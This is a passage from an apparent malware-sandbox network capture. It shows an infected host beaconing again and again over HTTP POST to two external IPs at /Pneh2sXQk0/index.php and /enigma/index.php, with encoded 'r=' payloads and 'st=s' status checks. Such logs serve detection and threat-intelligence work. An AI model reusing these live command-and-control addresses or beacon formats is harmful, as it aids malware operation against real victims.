                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:58.818104982 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1306192.168.2.551160193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:58.733251095 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:58.981889009 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1307192.168.2.551161193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:59.069010973 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:59.316235065 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1308192.168.2.551162193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:59.329032898 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:59.577739000 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1309192.168.2.551163193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:59.667876959 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:59.915719986 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1310192.168.2.551164193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:59.825238943 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:00.099315882 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1311192.168.2.551165193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:59.940135956 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:00.197169065 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1312192.168.2.551166193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:00.450005054 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:00.703012943 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1313192.168.2.551167193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:00.537699938 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:00.784501076 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1314192.168.2.551168193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:00.955657005 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:01.207039118 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1315192.168.2.551169193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:01.044456005 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:01.300843000 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1316192.168.2.551170193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:01.536145926 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:01.781701088 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1317192.168.2.551171193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:01.658165932 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:01.913620949 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1318192.168.2.551172193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:02.035464048 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:02.287914991 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1319192.168.2.551173193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:02.170758963 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:02.423598051 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1320192.168.2.551174193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:02.627404928 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:02.867762089 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1321192.168.2.551175193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:02.776216984 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:03.026442051 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1322192.168.2.551176193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:03.124958992 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
